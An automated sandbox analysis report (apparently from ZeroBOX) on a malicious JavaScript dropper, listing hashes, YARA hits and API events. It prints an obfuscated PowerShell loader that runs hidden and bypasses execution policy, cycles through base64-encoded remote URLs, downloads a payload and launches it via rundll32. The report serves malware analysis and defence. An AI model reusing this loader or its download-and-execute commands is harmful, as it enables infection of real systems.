Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6403_us	May 18, 2023, 9:25 a.m.	May 18, 2023, 9:27 a.m.

Size	245.7KB
Type	ASCII text, with very long lines, with CRLF line terminators
MD5	`d52732ffa135c7c2cc206f066a095102`
SHA256	`02736e3801e700601d6212804b2d824ae4771d32fb369044887fdc9f2076ddfd`
CRC32	`5171748A`
ssdeep	`3072:r5wWfAYdqVnGi52EQ4pn9UxoIwqeJFpKWVw7diU4rKYPplXq3P7DP:r5wWfAYUVGO2EQ4pn0oJPe2OCpRq3TDP`
Yara	Admin_Tool_IN_Zero - Admin Tool Sysinternals Generic_Malware_Zero - Generic Malware

wscript.exe "C:\Windows\System32\wscript.exe" C:\Users\test22\AppData\Local\Temp\Pzbrjg.js
1696
- wscript.exe "C:\Windows\System32\wscript.exe" "C:\Users\test22\AppData\Local\Temp\Pzbrjg.js" ApetalousnessTheriomorph Anisoin MultimetallicSemiweekly labionasalBeshell
  2160
  - powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -ExecutionPolicy Bypass -NoLogo -NoProfile -encodedcommand "JABVAG4AZABlAHIAcwBoAHIAdQBiAHMATwB2AGUAcgByAHUAbABlAGQAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBHADgAQQBlAEEAQgA1AEEASABBAEEAYwBnAEIAdgBBAEcAdwBBAGEAUQBCAHUAQQBHAFUAQQBMAGcAQgBqAEEARwA4AEEAZABRAEIAdwBBAEcAOABBAGIAZwBCAHoAQQBBAD0APQBHAGoAaABDAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAMQBBAEQAYwBBAEwAZwBBAHgAQQBEAGsAQQBPAEEAQQB1AEEARABJAEEATQBBAEEAMQBBAEMANABBAE4AZwBBADAAQQBBAD0APQBHAGoAaABDAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAdwBBAEcAZwBBAGUAUQBCAHMAQQBHAFUAQQBjAHcAQgBwAEEASABNAEEAWgBRAEIAegBBAEYAUQBBAGEAQQBCAGgAQQBHADQAQQBaAFEAQgB6AEEASABNAEEATABnAEIAdwBBAEcAdwBBAFkAUQBCAGoAQQBHAFUAQQAiADsAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMQAzADsAJAB1AG4AZABlAHIAawBpAG4AZAAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAVQBBAE4AZwBBAHUAQQBEAEkAQQBNAHcAQQB3AEEAQwA0AEEATQBRAEEAdwBBAEQAVQBBAEwAZwBBAHgAQQBEAFEAQQBPAEEAQQA9AE8AbQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAFYAQQBHADQAQQBZAFEAQgBrAEEARwAwAEEAYQBRAEIAdQBBAEcAawBBAGMAdwBCADAAQQBIAEkAQQBZAFEAQgAwAEEARwBrAEEAZABnAEIAbABBAEcAdwBBAGUAUQBCAFUAQQBIAEkAQQBiAHcAQgB3AEEARwBnAEEAYgB3AEIAdQBBAEgAVQBBAFkAdwBCAHMAQQBHAFUAQQBkAFEAQgB6AEEAQwA0AEEAWgBnAEIAeQBBAEEAPQA9AE8AbQBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAEUAQQBNAGcAQQA0AEEAQwA0AEEATQBRAEEANABBAEQAQQBBAEwAZwBBAHgAQQBEAEEAQQBOAEEAQQB1AEEARABJAEEATQBRAEEAeQBBAEEAPQA9ACIAOwAkAGQAZQB4AHQAcgBvAGwAaQBtAG8AbgBlAG4AZQAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQARQBBAE0AdwBBAHcAQQBDADQAQQBNAFEAQQB6AEEARABZAEEATABnAEEAeQBBAEQAQQBBAE4AZwBBAHUAQQBEAEUAQQBNAEEAQQB3AEEAQQA9AD0AdwBZAGYAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABnAEEATgBRAEEAdQBBAEQARQBBAE4AZwBBADIAQQBDADQAQQBNAGcAQQAxAEEARABBAEEATABnAEEAeABBAEQAawBBAE4AUQBBAD0AdwBZAGYAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBEAEEARwA4AEEAYgBnAEIAegBBAEgAVQBBAGIAUQBCAHQAQQBHAEUAQQBkAEEAQgBsAEEARwB3AEEAZQBRAEIAUQBBAEcAZwBBAFkAUQBCAHkAQQBIAGsAQQBiAGcAQgBuAEEARwA4AEEAYwBBAEIAaABBAEgASQBBAFkAUQBCAHMAQQBIAGsAQQBjAHcAQgBwAEEASABNAEEATABnAEIAegBBAEcAVQBBAGUAQQBCADUAQQBBAD0APQB3AFkAZgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAFEAQQBPAFEAQQB1AEEARABFAEEATQBnAEEAdwBBAEMANABBAE0AUQBBADQAQQBEAEkAQQBMAGcAQQB4AEEARABRAEEATQBnAEEAPQAiADsAJABzAHcAZQB2AGUAbgBzACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABFAEEATQBBAEEANABBAEMANABBAE0AUQBBADAAQQBEAEUAQQBMAGcAQQB4AEEARABnAEEATgBnAEEAdQBBAEQASQBBAE0AdwBBAHcAQQBBAD0APQAiADsAJABCAHIAZQBhAGsAZgBhAHMAdABpAG4AZwAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAWQBBAE0AZwBBAHUAQQBEAEkAQQBOAFEAQQB5AEEAQwA0AEEATQBRAEEAMwBBAEQASQBBAEwAZwBBADEAQQBEAFEAQQBMAHcAQQA1AEEARQBjAEEAVQBRAEEAMQBBAEUARQBBAE8AQQBBAHYAQQBFAHMAQQBSAEEAQgB6AEEARgBrAEEAYgB3AEIAYQBBAEgATQBBAFQAUQBBAD0AZgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAFEAQQBPAFEAQQB1AEEARABFAEEATgBRAEEAMABBAEMANABBAE0AUQBBADEAQQBEAGcAQQBMAGcAQQA1AEEARABFAEEATAB3AEIAWQBBAEcANABBAFoAQQBBAHYAQQBIAG8AQQBhAGcAQgBaAEEARQBJAEEAVwBBAEEAMABBAEcANABBAFoAQQBBAD0AZgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAFUAQQBPAEEAQQB1AEEARABJAEEATgBRAEEAMQBBAEMANABBAE0AZwBBAHgAQQBEAE0AQQBMAGcAQQB4AEEARABnAEEATQBRAEEAdgBBAEcAMABBAGEAUQBCAFMAQQBDADgAQQBRAGcAQgBUAEEARgBjAEEAVABRAEIAMgBBAEUAZwBBAGUAQQBCADIAQQBBAD0APQAiADsAZgBvAHIAZQBhAGMAaAAgACgAJABHAHIAbwB3AGUAZABFAGMAdABvAHoAbwBvAG4AIABpAG4AIAAkAEIAcgBlAGEAawBmAGEAcwB0AGkAbgBnACAALQBzAHAAbABpAHQAIAAiAGYAIgApACAAewAkAG4AbwBzAG8AbQBhAG4AaQBhAEQAZQBwAHUAcgBnAGUAZAAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEgAQQBBAFoAUQBCAHUAQQBIAFEAQQBZAFEAQgBtAEEARwB3AEEAZABRAEIAdgBBAEgASQBBAGEAUQBCAGsAQQBHAFUAQQBSAEEAQgAxAEEASABRAEEAWQB3AEIAbwBBAEcAVQBBAGMAdwBCAHoAQQBDADQAQQBaAHcAQgB6AEEAQQA9AD0ARgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAEUAQQBPAEEAQQB1AEEARABFAEEATgBBAEEAMABBAEMANABBAE4AdwBBADIAQQBDADQAQQBOAHcAQQAyAEEAQQA9AD0AIgA7ACQAUAByAG8AdABlAHUAcwAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQARQBBAE0AUQBBADIAQQBDADQAQQBNAFEAQQAwAEEARABnAEEATABnAEEAeQBBAEQATQBBAE0AUQBBAHUAQQBEAEUAQQBPAFEAQQB3AEEAQQA9AD0AIgA7ACQAQgBhAGcAdwB5AG4ARABvAGcAZgBpAHMAaABlAHMAIAA9ACAANAA2ADYAOwB0AHIAeQAgAHsAJAB2AGkAYgByAGEAdABvAHIAcwBJAG8AbgBpAGMAaQB6AGUAIAA9ACAAMgAwADUAOwAkAGMAbwB3AGgAaQBkAGUAcwAgAD0AIAA5ADUAMwA7ACQAQQBsAGEAbgBnAGkAbgBlAE8AdgBlAHIAaQBuAHQAZQBuAHMAaQB0AHkAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHkAQQBEAEUAQQBNAHcAQQB1AEEARABjAEEATgBBAEEAdQBBAEQARQBBAE4AZwBBADEAQQBDADQAQQBNAFEAQQAyAEEARABVAEEAbgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBIAE0AQQBiAEEAQgBoAEEARwA0AEEAWgB3AEIANQBBAEMANABBAGIAQQBCADAAQQBHAFEAQQAiADsAJABDAHkAbgBnAGgAYQBuAGUAZABkAFQAcgBpAGEAbgBnAHUAbABhAHIAaQBzACAAPQAgAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAbgBpAGMAbwBkAGUALgBHAGUAdABTAHQAcgBpAG4AZwAoAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAEcAcgBvAHcAZQBkAEUAYwB0AG8AegBvAG8AbgApACkAOwBpAHcAcgAgACQAQwB5AG4AZwBoAGEAbgBlAGQAZABUAHIAaQBhAG4AZwB1AGwAYQByAGkAcwAgAC0ATwAgAEMAOgBcAFAAcgBvAGcAcgBhAG0ARABhAHQAYQBcAHMAdQBsAHAAaABvAG4AZQBzAEcAbwBzAGgAZQBuAGkAdABlAC4AdQBuAGkAbgBoAGkAYgBpAHQAZQBkAGwAeQBWAGUAcgBiAGUAbgBvAGwAOwAkAHAAdQBsAGwAYQBiAGwAZQAgAD0AIAAiAHAAcgBlAGUAeABjAGwAdQBzAGkAdgBlAGwAeQBQAGkAdAB0AGkAbgBnACIAOwBpAGYAIAAoACgARwBlAHQALQBJAHQAZQBtACAALQBQAGEAdABoACAAQwA6AFwAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAcwB1AGwAcABoAG8AbgBlAHMARwBvAHMAaABlAG4AaQB0AGUALgB1AG4AaQBuAGgAaQBiAGkAdABlAGQAbAB5AFYAZQByAGIAZQBuAG8AbAApAC4ATABlAG4AZwB0AGgAIAAtAGcAZQAgADEAMwAxADkAMgA2ACkAewBwAG8AdwBlAHIAcwBoAGUAbABsACAALQBlAG4AYwBvAGQAZQBkAGMAbwBtAG0AYQBuAGQAIAAiAGMAdwBCADAAQQBHAEUAQQBjAGcAQgAwAEEAQwBBAEEAYwBnAEIAMQBBAEcANABBAFoAQQBCAHMAQQBHAHcAQQBNAHcAQQB5AEEAQwBBAEEAUQB3AEEANgBBAEYAdwBBAFUAQQBCAHkAQQBHADgAQQBaAHcAQgB5AEEARwBFAEEAYgBRAEIARQBBAEcARQBBAGQAQQBCAGgAQQBGAHcAQQBjAHcAQgAxAEEARwB3AEEAYwBBAEIAbwBBAEcAOABBAGIAZwBCAGwAQQBIAE0AQQBSAHcAQgB2AEEASABNAEEAYQBBAEIAbABBAEcANABBAGEAUQBCADAAQQBHAFUAQQBMAGcAQgAxAEEARwA0AEEAYQBRAEIAdQBBAEcAZwBBAGEAUQBCAGkAQQBHAGsAQQBkAEEAQgBsAEEARwBRAEEAYgBBAEIANQBBAEYAWQBBAFoAUQBCAHkAQQBHAEkAQQBaAFEAQgB1AEEARwA4AEEAYgBBAEEAcwBBAEUAUQBBAGIAQQBCAHMAQQBGAEkAQQBaAFEAQgBuAEEARwBrAEEAYwB3AEIAMABBAEcAVQBBAGMAZwBCAFQAQQBHAFUAQQBjAGcAQgAyAEEARwBVAEEAYwBnAEEANwBBAEUARQBBAGIAZwBCAG4AQQBIAFUAQQBiAEEAQgBoAEEASABJAEEAIgA7ACQAWgBlAG4AaQB0AGgAdwBhAHIAZABDAG8AbAB1AG0AYgBpAGQAYQBlACAAPQAgACIAYwBvAGwAbABlAGMAdABpAGIAaQBsAGkAdAB5AFMAZQBtAGkAcABhAHIAbwBjAGgAaQBhAGwAIgA7ACQAcwB1AGIAbABhAG4AZwB1AGEAZwBlAEgAbwBwAGUAaQB0AGUAIAA9ACAANgAyADQAOwAkAHMAaQBsAHYAZQByAGUAeQBlAE8AcgBnAGEAbgBpAGYAeQAgAD0AIAAiAGMAaABhAGMAawBlAHIAVgBpAGcAaQBsAHMAIgA7AGIAcgBlAGEAawA7AEEAbgBnAHUAbABhAHIAOwB9AEEAbgBnAHUAbABhAHIAOwB9ACAAYwBhAHQAYwBoACAAewAkAHIAaQBnAGgAdABlAHIAcwBIAGkAdgBlAHcAYQByAGQAIAA9ACAAMwAwADQAOwAkAGkAbgB0AGUAcgBuAHUAbgBjAGkAYQBsAGwAeQBBAHMAcwBhAGkAbAAgAD0AIAA3ADEANAA7ACQAVQBuAGEAYwBjAGUAcAB0AGEAYgBsAGUAbgBlAHMAcwAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeQBBAEQAQQBBAE4AdwBBAHUAQQBEAEUAQQBNAGcAQQB4AEEAQwA0AEEATQBRAEEAegBBAEQAZwBBAEwAZwBBAHkAQQBEAE0AQQBPAFEAQQA9AFAAWgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBHADAAQQBhAFEAQgB6AEEASABBAEEAYwBnAEIAdgBBAEcANABBAGQAUQBCAHUAQQBHAE0AQQBhAFEAQgBoAEEASABRAEEAYQBRAEIAdgBBAEcANABBAGMAdwBCAEQAQQBHAHcAQQBiAHcAQgAwAEEASABVAEEAYwBnAEIAbABBAEgATQBBAEwAZwBCAGkAQQBIAEkAQQAiADsAfQB9ACQAdQBuAG4AYQB1AHQAaQBjAGEAbABFAHgAcABlAHIAaQBtAGUAbgB0AGkAbgBnACAAPQAgACIAcABsAGUAbgBpAHMAbQAiADsAQQBuAGcAdQBsAGEAcgA7AA=="
    2280

Name	Response	Post-Analysis Lookup
No hosts contacted.

IP Address	Status	Action
No hosts contacted.

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Queries for the computername (6 events)

Time & API	Arguments	Status	Return
GetComputerNameW May 18, 2023, 9:25 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 18, 2023, 9:25 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 18, 2023, 9:25 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 18, 2023, 9:25 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA May 18, 2023, 9:25 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 18, 2023, 9:25 a.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (1 event)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent May 18, 2023, 9:25 a.m.			0	0

Command line console output was observed (43 events)

Time & API	Arguments	Status	Return
WriteConsoleW May 18, 2023, 9:25 a.m.	buffer: The term 'Angular' is not recognized as the name of a cmdlet, function, script console_handle: 0x00000023	1	1
WriteConsoleW May 18, 2023, 9:25 a.m.	buffer: file, or operable program. Check the spelling of the name, or if a path was inc console_handle: 0x0000002f	1	1
WriteConsoleW May 18, 2023, 9:25 a.m.	buffer: luded, verify that the path is correct and try again. console_handle: 0x0000003b	1	1
WriteConsoleW May 18, 2023, 9:25 a.m.	buffer: At line:1 char:2795 console_handle: 0x00000047	1	1
WriteConsoleW May 18, 2023, 9:25 a.m.	buffer: + $UndershrubsOverruled = "aAB0AHQAcABzADoALwAvAG8AeAB5AHAAcgBvAGwAaQBuAGUALgBj console_handle: 0x00000053	1	1
WriteConsoleW May 18, 2023, 9:25 a.m.	buffer: AG8AdQBwAG8AbgBzAA==GjhCaAB0AHQAcAA6AC8ALwA1ADcALgAxADkAOAAuADIAMAA1AC4ANgA0AA= console_handle: 0x0000005f	1	1
WriteConsoleW May 18, 2023, 9:25 a.m.	buffer: =GjhCaAB0AHQAcAA6AC8ALwBwAGgAeQBsAGUAcwBpAHMAZQBzAFQAaABhAG4AZQBzAHMALgBwAGwAYQ console_handle: 0x0000006b	1	1
WriteConsoleW May 18, 2023, 9:25 a.m.	buffer: BjAGUA";Start-Sleep -Seconds 13;$underkind = "aAB0AHQAcAA6AC8ALwAxADUANgAuADIAM console_handle: 0x00000077	1	1
WriteConsoleW May 18, 2023, 9:25 a.m.	buffer: wAwAC4AMQAwADUALgAxADQAOAA=OmaAB0AHQAcAA6AC8ALwBVAG4AYQBkAG0AaQBuAGkAcwB0AHIAYQ console_handle: 0x00000083	1	1
WriteConsoleW May 18, 2023, 9:25 a.m.	buffer: B0AGkAdgBlAGwAeQBUAHIAbwBwAGgAbwBuAHUAYwBsAGUAdQBzAC4AZgByAA==OmaAB0AHQAcABzADo console_handle: 0x0000008f	1	1
WriteConsoleW May 18, 2023, 9:25 a.m.	buffer: ALwAvADEAMgA4AC4AMQA4ADAALgAxADAANAAuADIAMQAyAA==";$dextrolimonene = "aAB0AHQAc console_handle: 0x0000009b	1	1
WriteConsoleW May 18, 2023, 9:25 a.m.	buffer: ABzADoALwAvADEAMwAwAC4AMQAzADYALgAyADAANgAuADEAMAAwAA==wYfaAB0AHQAcABzADoALwAvA console_handle: 0x000000a7	1	1
WriteConsoleW May 18, 2023, 9:25 a.m.	buffer: DgANQAuADEANgA2AC4AMgA1ADAALgAxADkANQA=wYfaAB0AHQAcAA6AC8ALwBDAG8AbgBzAHUAbQBtA console_handle: 0x000000b3	1	1
WriteConsoleW May 18, 2023, 9:25 a.m.	buffer: GEAdABlAGwAeQBQAGgAYQByAHkAbgBnAG8AcABhAHIAYQBsAHkAcwBpAHMALgBzAGUAeAB5AA==wYfa console_handle: 0x000000bf	1	1
WriteConsoleW May 18, 2023, 9:25 a.m.	buffer: AB0AHQAcAA6AC8ALwAxADQAOQAuADEAMgAwAC4AMQA4ADIALgAxADQAMgA=";$swevens = "aAB0AH console_handle: 0x000000cb	1	1
WriteConsoleW May 18, 2023, 9:25 a.m.	buffer: QAcABzADoALwAvADEAMAA4AC4AMQA0ADEALgAxADgANgAuADIAMwAwAA==";$Breakfasting = "aA console_handle: 0x000000d7	1	1
WriteConsoleW May 18, 2023, 9:25 a.m.	buffer: B0AHQAcAA6AC8ALwAxADYAMgAuADIANQAyAC4AMQA3ADIALgA1ADQALwA5AEcAUQA1AEEAOAAvAEsAR console_handle: 0x000000e3	1	1
WriteConsoleW May 18, 2023, 9:25 a.m.	buffer: ABzAFkAbwBaAHMATQA=faAB0AHQAcAA6AC8ALwAxADQAOQAuADEANQA0AC4AMQA1ADgALgA5ADEALwB console_handle: 0x000000ef	1	1
WriteConsoleW May 18, 2023, 9:25 a.m.	buffer: YAG4AZAAvAHoAagBZAEIAWAA0AG4AZAA=faAB0AHQAcAA6AC8ALwAxADUAOAAuADIANQA1AC4AMgAxA console_handle: 0x000000fb	1	1
WriteConsoleW May 18, 2023, 9:25 a.m.	buffer: DMALgAxADgAMQAvAG0AaQBSAC8AQgBTAFcATQB2AEgAeAB2AA==";foreach ($GrowedEctozoon i console_handle: 0x00000107	1	1
WriteConsoleW May 18, 2023, 9:25 a.m.	buffer: n $Breakfasting -split "f") {$nosomaniaDepurged = "aAB0AHQAcABzADoALwAvAHAAZQBu console_handle: 0x00000113	1	1
WriteConsoleW May 18, 2023, 9:25 a.m.	buffer: AHQAYQBmAGwAdQBvAHIAaQBkAGUARAB1AHQAYwBoAGUAcwBzAC4AZwBzAA==FaAB0AHQAcAA6AC8ALw console_handle: 0x0000011f	1	1
WriteConsoleW May 18, 2023, 9:25 a.m.	buffer: AxADEAOAAuADEANAA0AC4ANwA2AC4ANwA2AA==";$Proteus = "aAB0AHQAcABzADoALwAvADEAMQA console_handle: 0x0000012b	1	1
WriteConsoleW May 18, 2023, 9:25 a.m.	buffer: 2AC4AMQA0ADgALgAyADMAMQAuADEAOQAwAA==";$BagwynDogfishes = 466;try {$vibratorsIo console_handle: 0x00000137	1	1
WriteConsoleW May 18, 2023, 9:25 a.m.	buffer: nicize = 205;$cowhides = 953;$AlangineOverintensity = "aAB0AHQAcAA6AC8ALwAyADEA console_handle: 0x00000143	1	1
WriteConsoleW May 18, 2023, 9:25 a.m.	buffer: MwAuADcANAAuADEANgA1AC4AMQA2ADUAnaAB0AHQAcABzADoALwAvAHMAbABhAG4AZwB5AC4AbAB0AG console_handle: 0x0000014f	1	1
WriteConsoleW May 18, 2023, 9:25 a.m.	buffer: QA";$CynghaneddTriangularis = [System.Text.Encoding]::Unicode.GetString([System console_handle: 0x0000015b	1	1
WriteConsoleW May 18, 2023, 9:25 a.m.	buffer: .Convert]::FromBase64String($GrowedEctozoon));iwr $CynghaneddTriangularis -O C: console_handle: 0x00000167	1	1
WriteConsoleW May 18, 2023, 9:25 a.m.	buffer: \ProgramData\sulphonesGoshenite.uninhibitedlyVerbenol;$pullable = "preexclusive console_handle: 0x00000173	1	1
WriteConsoleW May 18, 2023, 9:25 a.m.	buffer: lyPitting";if ((Get-Item -Path C:\ProgramData\sulphonesGoshenite.uninhibitedlyV console_handle: 0x0000017f	1	1
WriteConsoleW May 18, 2023, 9:25 a.m.	buffer: erbenol).Length -ge 131926){powershell -encodedcommand "cwB0AGEAcgB0ACAAcgB1AG4 console_handle: 0x0000018b	1	1
WriteConsoleW May 18, 2023, 9:25 a.m.	buffer: AZABsAGwAMwAyACAAQwA6AFwAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAcwB1AGwAcABoAG8AbgBlAH console_handle: 0x00000197	1	1
WriteConsoleW May 18, 2023, 9:25 a.m.	buffer: MARwBvAHMAaABlAG4AaQB0AGUALgB1AG4AaQBuAGgAaQBiAGkAdABlAGQAbAB5AFYAZQByAGIAZQBuA console_handle: 0x000001a3	1	1
WriteConsoleW May 18, 2023, 9:25 a.m.	buffer: G8AbAAsAEQAbABsAFIAZQBnAGkAcwB0AGUAcgBTAGUAcgB2AGUAcgA7AEEAbgBnAHUAbABhAHIA";$Z console_handle: 0x000001af	1	1
WriteConsoleW May 18, 2023, 9:25 a.m.	buffer: enithwardColumbidae = "collectibilitySemiparochial";$sublanguageHopeite = 624;$ console_handle: 0x000001bb	1	1
WriteConsoleW May 18, 2023, 9:25 a.m.	buffer: silvereyeOrganify = "chackerVigils";break;Angular;}Angular;} catch {$rightersHi console_handle: 0x000001c7	1	1
WriteConsoleW May 18, 2023, 9:25 a.m.	buffer: veward = 304;$internunciallyAssail = 714;$Unacceptableness = "aAB0AHQAcAA6AC8AL console_handle: 0x000001d3	1	1
WriteConsoleW May 18, 2023, 9:25 a.m.	buffer: wAyADAANwAuADEAMgAxAC4AMQAzADgALgAyADMAOQA=PZaAB0AHQAcABzADoALwAvAG0AaQBzAHAAcg console_handle: 0x000001df	1	1
WriteConsoleW May 18, 2023, 9:25 a.m.	buffer: BvAG4AdQBuAGMAaQBhAHQAaQBvAG4AcwBDAGwAbwB0AHUAcgBlAHMALgBiAHIA";}}$unnauticalEx console_handle: 0x000001eb	1	1
WriteConsoleW May 18, 2023, 9:25 a.m.	buffer: perimenting = "plenism";Angular <<<< ; console_handle: 0x000001f7	1	1
WriteConsoleW May 18, 2023, 9:25 a.m.	buffer: + CategoryInfo : ObjectNotFound: (Angular:String) [], CommandNotF console_handle: 0x00000203	1	1
WriteConsoleW May 18, 2023, 9:25 a.m.	buffer: oundException console_handle: 0x0000020f	1	1
WriteConsoleW May 18, 2023, 9:25 a.m.	buffer: + FullyQualifiedErrorId : CommandNotFoundException console_handle: 0x0000021b	1	1

Uses Windows APIs to generate a cryptographic key (48 events)

Time & API	Arguments	Status	Return
CryptExportKey May 18, 2023, 9:25 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00565040 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 18, 2023, 9:25 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00565180 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 18, 2023, 9:25 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00565180 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 18, 2023, 9:25 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00565180 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 18, 2023, 9:25 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00564980 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 18, 2023, 9:25 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00564980 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 18, 2023, 9:25 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00564980 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 18, 2023, 9:25 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00564980 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 18, 2023, 9:25 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00564980 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 18, 2023, 9:25 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00564980 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 18, 2023, 9:25 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00565180 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 18, 2023, 9:25 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00565180 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 18, 2023, 9:25 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00565180 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 18, 2023, 9:25 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00565700 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 18, 2023, 9:25 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00565700 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 18, 2023, 9:25 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00565700 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 18, 2023, 9:25 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00565400 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 18, 2023, 9:25 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00565700 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 18, 2023, 9:25 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00565700 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 18, 2023, 9:25 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00565700 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 18, 2023, 9:25 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00565700 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 18, 2023, 9:25 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00565700 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 18, 2023, 9:25 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00565700 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 18, 2023, 9:25 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00565700 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 18, 2023, 9:25 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005654c0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 18, 2023, 9:25 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005654c0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 18, 2023, 9:25 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005654c0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 18, 2023, 9:25 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005654c0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
